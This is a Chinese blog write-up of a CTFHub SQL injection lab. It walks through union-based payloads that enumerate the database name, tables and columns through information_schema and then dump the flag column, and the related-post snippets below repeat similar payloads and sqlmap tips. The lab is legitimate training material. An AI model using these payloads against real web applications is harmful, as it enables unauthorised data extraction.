CTFHUB-WEB-SQL注入-MySql结构

最新推荐文章于 2024-06-12 03:10:54 发布
最新推荐文章于 2024-06-12 03:10:54 发布
阅读量86 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49539962/article/details/132122460
版权

原题

 

解题思路

        前面的几题用的都是MySQL的数据库,所以这里的解法其实和整数型、字符型注入区别不大。

        按提示输入一个1,回显有两列,看看这两列是不是都有用。 

        看起来两个都有用

-1 union select 11,22

         那接下来就依次看数据库名、表名、列名和flag名就行。

-1 union select 11,database()

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

 

        终于不是用flag做表名,下面依次看两个表的内容就行。news之前几题都与flag出现过,应该是把flag换成pvrxgcvlli 。

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='pvrxgcvlli'

         列名也变了。

-1 union select 1,group_concat(fqgxuedori) from pvrxgcvlli

 

 

mysmartwish
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CTFHUB-技能树-Web题-SQL注入-Mysql结构-Cookie注入
Static______的博客
04-05 572
这里其实可以将数据包放入重放器中进行。得到两个表名,查看第一个表的字段。输入1 and 1=1 有回显。输入1 and 1=2 无回显。由此判断可回显字段为1,2字段。
CTFHUB-web-SQL注入
ookami6497的博客
11-29 727
CTFHUB SQL
CTFHub-MYSQL结构-wp
z1moq的博客
05-16 199
MySQL结构 对注入条件进行测试 输入 1 时正常返回 输入 1’ 时无法正常返回 输入 1+1 时正常返回 id=2 的值 说明存在整数型SQL注入 使用 order by 检查字段数 字段数为 2 使用 1 union select 1,2,3 检查输出字段数 与order by 得出的结果相同 -1 union select 1,database() #得出表名:sqli -1 union select 1,group_concat(table_name) from informa
CTFHUB-WEB-SQL注入-时间盲注
weixin_49539962的博客
08-05 333
题目提示是使用时间盲注,并且不会有回显。解题的原理,是通过提交查询语句之后页面的刷新速度判断查询是否正确,如果正确从数据库中查找并返回response耗时比错误的语句稍长一些。但实际操作中受网络波动影响较大,使用sqlmap工具会方便很多。
CTFHUB-技能树-Web题-SQL注入-Mysql结构
Static______的博客
04-04 765
3.除了y和n,还有两个特殊选项。一个是a,表示alway,就是总是获取。一个是q,表示退出。4.不想手动选择,则在执行sqlmap的时候,加上–batch和–smart选项。在使用sqlmap过程中,经常需要用户进行选择,如[Y/n]。1.大写的为默认选项。如果不输入,就自动使用该选项。得到两个表名,爆第一个表的字段名看看有什么信息。2.我们输入时,不用区分大小写。得到一个字段名,看看有什么数据。1 and 1=1 有回显。1 and 1=2 无回显。
CTFHUB-技能树-Web题-SQL注入-Mysql结构-UA注入
Static______的博客
04-08 570
虽然有提示,在此还是按常规进行一下注入点判断吧。利用bp抓包,发送至repeater进行判断。1,2都回显,由此判断可回显字段数为2。得到两个表名,尝试查看第一个表中的数据。UA注入,即User-Agent注入。UA注入 需要用到leve 3。注入点在User-Agent。得到列名xwprqxhxjd。由此判断,表中有两个字段。由此判断,此处为注入点。得到数据库名为sqli。
ctfhub-web-sql-整型注入/字符型注入/报错注入/布尔盲注/时间盲注/mysql结构/cookie注入/ua注入
2301_80162151的博客
03-01 757
id=1’ and sleep(5) --+,看网络有没有延迟,有的话就是存在时间盲注。(完全没变化的页面,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。技能树的这些sql,肯定是存在,所以直接sqlmap获取库名。sqlmap -u url -D 库名 --tables。时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站。聚合函数也称作计数函数,返回查询对象的总数。判断页面是否正常,1=1和1=2是俩个页面。慢慢等一会,他有点慢,出现了库名sqli。函数 获取字符串的长度。
Ctfhub - web -- SQL注入
m0_52920608的博客
01-28 3789
CTFHub sql注入 web mysql python脚本
计算机-mysql-基于Web应用的SQL注入攻击入侵检测研究.pdf
07-08
"计算机-mysql-基于Web应用的SQL注入攻击入侵检测研究" 本研究论文主要研究了基于Web应用的SQL注入攻击入侵检测技术,以解决当前Web应用系统中常见的SQL注入漏洞问题。论文首先对SQL注入攻击的基本概念和原理进行了...
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
10-sql注入-mysql注入1
08-03
SQL注入是一种常见的安全漏洞,通常发生在Web应用程序中,允许攻击者通过输入恶意SQL代码来操纵数据库。MySQL注入是其中一种,特别针对使用MySQL数据库的应用。本文将深入探讨MySQL注入的原理、常见攻击手段以及防范...
vue+element-ui+websql
04-19
使用vue+elemetnui框架,采用websql/localsotrage作为数据存储,实现增删改查
数字时代网络安全即服务的兴起
网络研究观
06-11 601
网络安全即服务是一种通过基于云的服务来管理安全需求的综合方法。
网络安全(补充)
m0_62207482的博客
06-11 1184
同步包风暴(SYN Flood)攻击者假造源网址发送多个同步数据包(SYN Packet)给服务器,服务器因无法收到确认数据包(ACK Packet),使TCP/IP协议三次握手无法顺利完成,因而无法建立连接。其原理是发送大量半连接状态的服务请求,使服务主机无法处理正常的连接请求,因而影响正常运作 泪滴攻击暴露出IP数据包分解与重组的弱点,当IP数据包在网络中传输时,会被分解成许多不同的包传送,并借由偏移量字段作为重组的依据。泪滴攻击通过加入过多或不必要的偏移量字段,使计算机系统重组错乱,产生不可预期的后
网络安全练气篇——常见服务端口对应漏洞
最新发布
weixin_55762309的博客
06-12 881
FTP服务的数据传输端口。
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值